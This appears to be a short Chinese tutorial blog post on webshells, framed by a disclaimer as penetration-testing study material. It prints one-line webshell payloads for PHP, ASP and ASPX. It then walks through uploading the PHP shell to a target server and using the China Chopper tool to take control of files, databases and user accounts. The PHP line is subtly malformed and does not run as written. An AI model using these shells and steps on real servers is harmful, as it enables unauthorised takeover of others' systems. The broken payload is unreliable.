提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试
一、webshell是什么?
“Web” 的含义是服务器开放web服务;
"Shell"的含义是取得对服务器某种程度上的操作权限;
"webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。
二、木马
在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件
木马分为大马、小马和一句话木马:
- 小马:文件体积小、上传文件、文件修改、文件管理
- 大马:文件体积较大、功能齐全、能够提权、操作数据库等(不推荐)
- 一句话木马:短小精悍、功能强大、隐蔽性好、客户端直接管理(主流)
php
<?php @eval($_POST['x'];?)>
asp
<%eval request ("x")%>
aspx
<%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>
三、中国菜刀
这里以php为例
首先我们先将php一句话木马上传到目标服务器中,用菜刀去尝试连接
在地址中填写上传一句话木马的地址,在后面的方框中填写所要连接的参数(也就是代码中的’x’)
添加完成之后就可以对目标服务器进行控制,可以对文件进行相关的操作,也可以对数据库进行操作,也可以创建一个用户。